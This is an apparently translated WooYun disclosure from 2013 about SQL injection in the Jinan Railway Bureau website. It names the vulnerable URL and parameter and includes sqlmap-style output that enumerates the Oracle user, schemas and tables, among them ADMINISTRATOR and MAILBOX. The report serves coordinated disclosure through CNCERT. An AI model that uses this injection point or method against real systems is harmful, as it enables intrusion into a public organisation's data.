Vulnerability Summary

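Defect ID: wooyun-2013-042944

Title: Oracle injection vulnerability at Jinan Railway Bureau

Vendor: Jinan Railway Bureau (济南铁路局)

Author: adm1n

Submitted: 2013-11-15 11:33

Fixed: 2013-12-30 11:34

Publicly disclosed: 2013-12-30 11:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; if you have questions or need help, contact [email protected]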


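Vulnerability Details

Disclosure status:

2013-11-15: Details reported to the vendor; awaiting vendor action
2013-11-19: Vendor confirmed; details disclosed to the vendor only
2013-11-29: Details disclosed to core white hats and experts in related fields
2013-12-09: Details disclosed to regular white hats
2013-12-19: Details disclosed to intern white hats
2013-12-30: Details disclosed to the public

Brief description:

Oracle injection vulnerability at Jinan Railway Bureau

Detailed description: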

1.http://www.jntlj.com/cx_nr.aspx?type=SSXW&id=5674

Proof of vulnerability:

web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[15:06:04] [INFO] fetching current user
[15:06:04] [INFO] retrieved: OFFICE
current user: 'OFFICE'
[15:06:04] [WARNING] HTTP error codes detected during run:
[15:07:31] [INFO] fetching current database
[15:07:31] [INFO] resumed: OFFICE
[15:07:31] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'OFFICE'
Database: XDB
[1 table]
+--------------------------------+
| XDB$XIDX_IMP_T |
+--------------------------------+
Database: OFFICE
[33 tables]
+--------------------------------+
| ADMINISTRATOR |
| ANSWER_TEXT |
| BGAPP_DWZD |
| BGAPP_FILE |
| BGAPP_FILE_BAK |
| BGAPP_MEDIA |
| BGAPP_MESSAGE |
| BGAPP_USER |
| GW_DWZD |
| GW_FILE |
| GW_MEDIA |
| GW_USER |
| INFO_RANK |
| INFO_TYPE |
| LOCAL_DIC |
| MAILBOX |
| MAILBOX_TEXT |
| NUMBER_STATUS |
| OPER |
| OPERATE_LOG |
| OPER_DEF |
| QUERY_LOG |
| SUB_MENU |
| UNIT_DEPART_CODE |
| USER_CODE |
| WANGDIAN |
| XCINFO_BASE |
| XCINFO_IMAG |
| XCINFO_TEXT |
| YWIMAGES |
| YWJDXX |
| YWJDXX_TEXT |
| YWLINKBASE |
+--------------------------------+
Database: APEX_030200
[3 tables]
+--------------------------------+
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+--------------------------------+
Database: OLAPSYS
[2 tables]
+--------------------------------+
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
+--------------------------------+
Database: SYSTEM
[7 tables]
+--------------------------------+
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: MDSYS
[47 tables]
+--------------------------------+
| NTV2_XML_DATA |
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT |
| SDO_CS_CONTEXT_INFORMATION |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TIN_PC_SEQ |
| SDO_TIN_PC_SYSDATA_TABLE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_WFS_LOCAL_TXNS |
| SDO_WS_CONFERENCE |
| SDO_WS_CONFERENCE_PARTICIPANTS |
| SDO_WS_CONFERENCE_RESULTS |
| SDO_XML_SCHEMAS |
| SRSNAMESPACE_TABLE |
+--------------------------------+
Database: WZPT
[1 table]
+--------------------------------+
| RMSTAT_CATALOGDT |
+--------------------------------+
Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| DR$THS |
| DR$THS_PHRASE |
+--------------------------------+

Suggested fix:

Handle it as you see fit~

Copyright notice: when reposting, please credit the source adm1n@WooYun


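Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2013-11-19 21:35

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been forwarded via CNCERT to the Shandong sub-center, which will follow up with the organization that manages the website to handle it. rank 11

Latest status:

None yet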
